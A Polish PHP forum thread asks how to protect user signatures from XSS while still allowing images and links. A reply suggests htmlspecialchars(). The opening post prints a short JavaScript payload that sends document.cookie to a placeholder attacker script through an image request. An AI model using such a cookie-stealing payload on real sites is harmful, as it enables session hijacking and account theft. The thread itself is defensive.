Witaj Gościu! ( Zaloguj | Rejestruj )

Forum PHP.pl

> Jak zabezpieczyć np. podpis na forum, przed atakami XSS
TomASS
post
Post #1





Grupa: Zarejestrowani
Postów: 1 660
Pomógł: 13
Dołączył: 9.06.2004
Skąd: Wrocław i okolice

Ostrzeżenie: (0%)
-----


Tak sobie myślę, że w większości for jest podpis użytkownika. Niektóre fora nie filtrują podpisów (np. mogę dać w podpisie obrazek itp.) a jakby tak dać:

  1. <script type="text/javascript">
  2. var adr = 'zly_skrypt.php?ciasteczka=' + escape(document.cookie);
  3. var obr = '<IMG src="' + adr + '">';
  4. document.write(obr);


To się chyba nazywa atak XSS.

Jak się przed tym zabezpieczyć, aby np. akceptował obrazki, odnośniki itp. a nie akceptował "złych skryptów"?
Go to the top of the page
+Quote Post
 
Start new topic
Odpowiedzi
marcini82
post
Post #2





Grupa: Zarejestrowani
Postów: 190
Pomógł: 1
Dołączył: 20.05.2005
Skąd: Poznań

Ostrzeżenie: (0%)
-----


Cytat
A co jeśli zamiast '<script' będzie '< script'?

Przegladarka tego nie lyknie, sprawdz (IMG:http://forum.php.pl/style_emoticons/default/smile.gif)

htmlspecialchars() tez jest w tym przypadku ok, bo wtedy '<script' po prostu sie wyswietli jak kazdy inny ciag.

Ten post edytował marcini82 11.07.2007, 06:48:32
Go to the top of the page
+Quote Post

Posty w temacie


Reply to this topicStart new topic
2 Użytkowników czyta ten temat (2 Gości i 0 Anonimowych użytkowników)
0 Zarejestrowanych:

 



RSS Aktualny czas: 10.10.2025 - 09:14